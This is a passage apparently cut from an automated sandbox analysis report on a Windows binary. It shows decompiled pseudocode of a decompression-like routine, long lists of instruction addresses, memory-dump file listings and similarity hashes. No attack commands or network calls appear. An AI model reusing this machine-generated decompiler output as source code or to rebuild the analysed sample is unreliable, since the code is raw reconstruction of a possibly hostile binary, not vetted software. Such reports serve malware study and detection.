									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                            0x00000000
                                                                                                            0x0040647d
                                                                                                            0x0040647d
                                                                                                            0x00406481
                                                                                                            0x00406538
                                                                                                            0x0040653b
                                                                                                            0x00406547
                                                                                                            0x00406428
                                                                                                            0x00406428
                                                                                                            0x0040642b
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00406813
                                                                                                            0x00406813
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x004067ee
                                                                                                            0x004067ee
                                                                                                            0x004067f2
                                                                                                            0x004069a1
                                                                                                            0x00000000
                                                                                                            0x004069a1
                                                                                                            0x004067fe
                                                                                                            0x00406805
                                                                                                            0x0040680d
                                                                                                            0x00406810
                                                                                                            0x00000000
                                                                                                            0x00406810
                                                                                                            0x00406487
                                                                                                            0x0040648b
                                                                                                            0x004069cc
                                                                                                            0x004069cc
                                                                                                            0x004069cf
                                                                                                            0x004069d3
                                                                                                            0x004069d3
                                                                                                            0x00406491
                                                                                                            0x00406497
                                                                                                            0x0040649a
                                                                                                            0x0040649e
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x004069b7
                                                                                                            0x004069bf
                                                                                                            0x004069c6
                                                                                                            0x004069c8
                                                                                                            0x00000000
                                                                                                            0x004069c8
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x004064dc
                                                                                                            0x004064dc
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x00000000
                                                                                                            0x00405fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fd8
                                                                                                            0x00405fdb
                                                                                                            0x00405fde
                                                                                                            0x00405fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fe8
                                                                                                            0x00405feb
                                                                                                            0x00405fed
                                                                                                            0x00405fee
                                                                                                            0x00405ff1
                                                                                                            0x00405ff3
                                                                                                            0x00405ff4
                                                                                                            0x00405ff6
                                                                                                            0x00405ff9
                                                                                                            0x00405ffe
                                                                                                            0x00406003
                                                                                                            0x0040600c
                                                                                                            0x0040601f
                                                                                                            0x00406022
                                                                                                            0x0040602e
                                                                                                            0x00406056
                                                                                                            0x00406058
                                                                                                            0x00406066
                                                                                                            0x00406066
                                                                                                            0x0040606a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x0040605a
                                                                                                            0x0040605d
                                                                                                            0x0040605e
                                                                                                            0x0040605e
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x00406034
                                                                                                            0x00406039
                                                                                                            0x00406039
                                                                                                            0x00406042
                                                                                                            0x0040604a
                                                                                                            0x0040604d
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406070
                                                                                                            0x00406070
                                                                                                            0x00406074
                                                                                                            0x00406920
                                                                                                            0x00000000
                                                                                                            0x00406920
                                                                                                            0x0040607d
                                                                                                            0x0040608d
                                                                                                            0x00406090
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406096
                                                                                                            0x0040609a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040609c
                                                                                                            0x004060a2
                                                                                                            0x004060cc
                                                                                                            0x004060d2
                                                                                                            0x004060d9
                                                                                                            0x00000000
                                                                                                            0x004060d9
                                                                                                            0x004060a8
                                                                                                            0x004060ab
                                                                                                            0x004060b0
                                                                                                            0x004060b0
                                                                                                            0x004060bb
                                                                                                            0x004060c3
                                                                                                            0x004060c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040610b
                                                                                                            0x00406111
                                                                                                            0x00406114
                                                                                                            0x00406121
                                                                                                            0x00406129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004060e0
                                                                                                            0x004060e0
                                                                                                            0x004060e4
                                                                                                            0x0040692f
                                                                                                            0x00000000
                                                                                                            0x0040692f
                                                                                                            0x004060f0
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fe
                                                                                                            0x00406101
                                                                                                            0x00406104
                                                                                                            0x00406109
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406131
                                                                                                            0x00406133
                                                                                                            0x00406136
                                                                                                            0x004061a7
                                                                                                            0x004061aa
                                                                                                            0x004061ad
                                                                                                            0x004061b4
                                                                                                            0x004061be
                                                                                                            0x00000000
                                                                                                            0x004061be
                                                                                                            0x00406138
                                                                                                            0x0040613c
                                                                                                            0x0040613f
                                                                                                            0x00406141
                                                                                                            0x00406144
                                                                                                            0x00406147
                                                                                                            0x00406149
                                                                                                            0x0040614c
                                                                                                            0x0040614e
                                                                                                            0x00406153
                                                                                                            0x00406156
                                                                                                            0x00406159
                                                                                                            0x0040615d
                                                                                                            0x00406164
                                                                                                            0x00406167
                                                                                                            0x0040616e
                                                                                                            0x00406172
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x0040617e
                                                                                                            0x00406181
                                                                                                            0x0040619f
                                                                                                            0x004061a1
                                                                                                            0x00000000
                                                                                                            0x00406183
                                                                                                            0x00406183
                                                                                                            0x00406186
                                                                                                            0x00406189
                                                                                                            0x0040618c
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x00406191
                                                                                                            0x00406194
                                                                                                            0x00406196
                                                                                                            0x00406197
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x004063d0
                                                                                                            0x004063d4
                                                                                                            0x004063f2
                                                                                                            0x004063f5
                                                                                                            0x004063fc
                                                                                                            0x004063ff
                                                                                                            0x00406402
                                                                                                            0x00406405
                                                                                                            0x00406408
                                                                                                            0x0040640b
                                                                                                            0x0040640d
                                                                                                            0x00406414
                                                                                                            0x00406415
                                                                                                            0x00406417
                                                                                                            0x0040641a
                                                                                                            0x0040641d
                                                                                                            0x00406420
                                                                                                            0x00406420
                                                                                                            0x00406425
                                                                                                            0x00000000
                                                                                                            0x00406425
                                                                                                            0x004063d6
                                                                                                            0x004063d9
                                                                                                            0x004063dc
                                                                                                            0x004063e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040643a
                                                                                                            0x0040643e
                                                                                                            0x00406461
                                                                                                            0x00406464
                                                                                                            0x00406467
                                                                                                            0x00406471
                                                                                                            0x00406440
                                                                                                            0x00406440
                                                                                                            0x00406443
                                                                                                            0x00406446
                                                                                                            0x00406449
                                                                                                            0x00406456
                                                                                                            0x00406459
                                                                                                            0x00406459
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064ee
                                                                                                            0x004064f2
                                                                                                            0x004064f9
                                                                                                            0x004064fc
                                                                                                            0x004064ff
                                                                                                            0x00406509
                                                                                                            0x00000000
                                                                                                            0x00406509
                                                                                                            0x004064f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406515
                                                                                                            0x00406519
                                                                                                            0x00406520
                                                                                                            0x00406523
                                                                                                            0x00406526
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x00406529
                                                                                                            0x0040652c
                                                                                                            0x0040652f
                                                                                                            0x0040652f
                                                                                                            0x00406532
                                                                                                            0x00406535
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004065d5
                                                                                                            0x004065d5
                                                                                                            0x004065d9
                                                                                                            0x00406977
                                                                                                            0x00000000
                                                                                                            0x00406977
                                                                                                            0x004065df
                                                                                                            0x004065e2
                                                                                                            0x004065e5
                                                                                                            0x004065e9
                                                                                                            0x004065ec
                                                                                                            0x004065f2
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f7
                                                                                                            0x004065fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061ca
                                                                                                            0x004061ca
                                                                                                            0x004061ce
                                                                                                            0x0040693b
                                                                                                            0x00000000
                                                                                                            0x0040693b
                                                                                                            0x004061d4
                                                                                                            0x004061d7
                                                                                                            0x004061da
                                                                                                            0x004061de
                                                                                                            0x004061e1
                                                                                                            0x004061e7
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061ec
                                                                                                            0x004061ef
                                                                                                            0x004061ef
                                                                                                            0x004061f2
                                                                                                            0x004061f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061fb
                                                                                                            0x00406201
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406207
                                                                                                            0x00406207
                                                                                                            0x0040620b
                                                                                                            0x0040620e
                                                                                                            0x00406211
                                                                                                            0x00406214
                                                                                                            0x00406217
                                                                                                            0x00406218
                                                                                                            0x0040621b
                                                                                                            0x0040621d
                                                                                                            0x00406223
                                                                                                            0x00406226
                                                                                                            0x00406229
                                                                                                            0x0040622c
                                                                                                            0x0040622f
                                                                                                            0x00406232
                                                                                                            0x00406235
                                                                                                            0x00406251
                                                                                                            0x00406254
                                                                                                            0x00406257
                                                                                                            0x0040625a
                                                                                                            0x00406261
                                                                                                            0x00406265
                                                                                                            0x00406267
                                                                                                            0x0040626b
                                                                                                            0x00406237
                                                                                                            0x00406237
                                                                                                            0x0040623b
                                                                                                            0x00406243
                                                                                                            0x00406248
                                                                                                            0x0040624a
                                                                                                            0x0040624c
                                                                                                            0x0040624c
                                                                                                            0x0040626e
                                                                                                            0x00406275
                                                                                                            0x00406278
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x00406283
                                                                                                            0x00406283
                                                                                                            0x00406287
                                                                                                            0x00406947
                                                                                                            0x00000000
                                                                                                            0x00406947
                                                                                                            0x0040628d
                                                                                                            0x00406290
                                                                                                            0x00406293
                                                                                                            0x00406297
                                                                                                            0x0040629a
                                                                                                            0x004062a0
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a5
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004062b0
                                                                                                            0x004062b3
                                                                                                            0x004062b6
                                                                                                            0x004062b9
                                                                                                            0x004062bc
                                                                                                            0x004062bf
                                                                                                            0x004062c2
                                                                                                            0x004062c5
                                                                                                            0x004062c8
                                                                                                            0x004062cb
                                                                                                            0x004062ce
                                                                                                            0x004062e6
                                                                                                            0x004062e9
                                                                                                            0x004062ec
                                                                                                            0x004062ef
                                                                                                            0x004062ef
                                                                                                            0x004062f2
                                                                                                            0x004062f6
                                                                                                            0x004062f8
                                                                                                            0x004062d0
                                                                                                            0x004062d0
                                                                                                            0x004062d8
                                                                                                            0x004062dd
                                                                                                            0x004062df
                                                                                                            0x004062e1
                                                                                                            0x004062e1
                                                                                                            0x004062fb
                                                                                                            0x00406302
                                                                                                            0x00406305
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406305
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406347
                                                                                                            0x00406347
                                                                                                            0x0040634b
                                                                                                            0x00406953
                                                                                                            0x00000000
                                                                                                            0x00406953
                                                                                                            0x00406351
                                                                                                            0x00406354
                                                                                                            0x00406357
                                                                                                            0x0040635b
                                                                                                            0x0040635e
                                                                                                            0x00406364
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406369
                                                                                                            0x0040636c
                                                                                                            0x0040636c
                                                                                                            0x00406372
                                                                                                            0x00406310
                                                                                                            0x00406310
                                                                                                            0x00406313
                                                                                                            0x00000000
                                                                                                            0x00406313
                                                                                                            0x00406374
                                                                                                            0x00406374
                                                                                                            0x00406377
                                                                                                            0x0040637a
                                                                                                            0x0040637d
                                                                                                            0x00406380
                                                                                                            0x00406383
                                                                                                            0x00406386
                                                                                                            0x00406389
                                                                                                            0x0040638c
                                                                                                            0x0040638f
                                                                                                            0x00406392
                                                                                                            0x004063aa
                                                                                                            0x004063ad
                                                                                                            0x004063b0
                                                                                                            0x004063b3
                                                                                                            0x004063b3
                                                                                                            0x004063b6
                                                                                                            0x004063ba
                                                                                                            0x004063bc
                                                                                                            0x00406394
                                                                                                            0x00406394
                                                                                                            0x0040639c
                                                                                                            0x004063a1
                                                                                                            0x004063a3
                                                                                                            0x004063a5
                                                                                                            0x004063a5
                                                                                                            0x004063bf
                                                                                                            0x004063c6
                                                                                                            0x004063c9
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x00406658
                                                                                                            0x00406658
                                                                                                            0x0040665c
                                                                                                            0x00406983
                                                                                                            0x00000000
                                                                                                            0x00406983
                                                                                                            0x00406662
                                                                                                            0x00406665
                                                                                                            0x00406668
                                                                                                            0x0040666c
                                                                                                            0x0040666f
                                                                                                            0x00406675
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x0040667a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406767
                                                                                                            0x0040676b
                                                                                                            0x0040678d
                                                                                                            0x00406790
                                                                                                            0x0040679a
                                                                                                            0x00000000
                                                                                                            0x0040679a
                                                                                                            0x0040676d
                                                                                                            0x00406770
                                                                                                            0x00406774
                                                                                                            0x00406777
                                                                                                            0x00406777
                                                                                                            0x0040677a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406824
                                                                                                            0x00406828
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x0040684d
                                                                                                            0x00406854
                                                                                                            0x0040685b
                                                                                                            0x0040685b
                                                                                                            0x00000000
                                                                                                            0x0040685b
                                                                                                            0x0040682a
                                                                                                            0x0040682d
                                                                                                            0x00406830
                                                                                                            0x00406833
                                                                                                            0x0040683a
                                                                                                            0x0040677e
                                                                                                            0x0040677e
                                                                                                            0x00406781
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406915
                                                                                                            0x00406918
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040654f
                                                                                                            0x00406551
                                                                                                            0x00406558
                                                                                                            0x00406559
                                                                                                            0x0040655b
                                                                                                            0x0040655e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406566
                                                                                                            0x00406569
                                                                                                            0x0040656c
                                                                                                            0x0040656e
                                                                                                            0x00406570
                                                                                                            0x00406570
                                                                                                            0x00406571
                                                                                                            0x00406574
                                                                                                            0x0040657b
                                                                                                            0x0040657e
                                                                                                            0x0040658c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406871
                                                                                                            0x00406871
                                                                                                            0x00406875
                                                                                                            0x004069ad
                                                                                                            0x00000000
                                                                                                            0x004069ad
                                                                                                            0x0040687b
                                                                                                            0x0040687e
                                                                                                            0x00406881
                                                                                                            0x00406885
                                                                                                            0x00406888
                                                                                                            0x0040688e
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406893
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406899
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x004068fd
                                                                                                            0x00406900
                                                                                                            0x00406905
                                                                                                            0x00406906
                                                                                                            0x00406908
                                                                                                            0x0040690a
                                                                                                            0x0040690d
                                                                                                            0x00000000
                                                                                                            0x0040690d
                                                                                                            0x0040689f
                                                                                                            0x004068a5
                                                                                                            0x004068a8
                                                                                                            0x004068ab
                                                                                                            0x004068ae
                                                                                                            0x004068b1
                                                                                                            0x004068b4
                                                                                                            0x004068b7
                                                                                                            0x004068ba
                                                                                                            0x004068bd
                                                                                                            0x004068c0
                                                                                                            0x004068d9
                                                                                                            0x004068dc
                                                                                                            0x004068df
                                                                                                            0x004068e2
                                                                                                            0x004068e6
                                                                                                            0x004068e8
                                                                                                            0x004068e8
                                                                                                            0x004068e9
                                                                                                            0x004068ec
                                                                                                            0x004068c2
                                                                                                            0x004068c2
                                                                                                            0x004068ca
                                                                                                            0x004068cf
                                                                                                            0x004068d1
                                                                                                            0x004068d4
                                                                                                            0x004068d4
                                                                                                            0x004068ef
                                                                                                            0x004068f6
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x00406594
                                                                                                            0x00406597
                                                                                                            0x004065cd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x00406700
                                                                                                            0x00406700
                                                                                                            0x00406703
                                                                                                            0x00406705
                                                                                                            0x0040698f
                                                                                                            0x00000000
                                                                                                            0x0040698f
                                                                                                            0x0040670b
                                                                                                            0x0040670e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406714
                                                                                                            0x00406718
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x00000000
                                                                                                            0x0040671b
                                                                                                            0x00406599
                                                                                                            0x0040659b
                                                                                                            0x0040659d
                                                                                                            0x0040659f
                                                                                                            0x004065a2
                                                                                                            0x004065a3
                                                                                                            0x004065a5
                                                                                                            0x004065a7
                                                                                                            0x004065aa
                                                                                                            0x004065ad
                                                                                                            0x004065c3
                                                                                                            0x004065c8
                                                                                                            0x00406600
                                                                                                            0x00406600
                                                                                                            0x00406604
                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406316
                                                                                                            0x00406316
                                                                                                            0x0040631a
                                                                                                            0x0040695f
                                                                                                            0x00000000
                                                                                                            0x0040695f
                                                                                                            0x00406320
                                                                                                            0x00406323
                                                                                                            0x00406326
                                                                                                            0x00406329
                                                                                                            0x0040632c
                                                                                                            0x0040632f
                                                                                                            0x00406332
                                                                                                            0x00406334
                                                                                                            0x00406337
                                                                                                            0x0040633a
                                                                                                            0x0040633d
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                            • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                                            • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                            • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
